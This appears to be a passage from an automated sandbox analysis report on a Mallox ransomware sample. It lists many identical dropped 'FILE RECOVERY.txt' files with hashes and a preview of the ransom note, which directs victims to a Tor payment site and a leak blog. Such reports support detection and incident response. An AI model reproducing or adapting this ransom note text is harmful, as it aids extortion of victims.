                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Tips\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
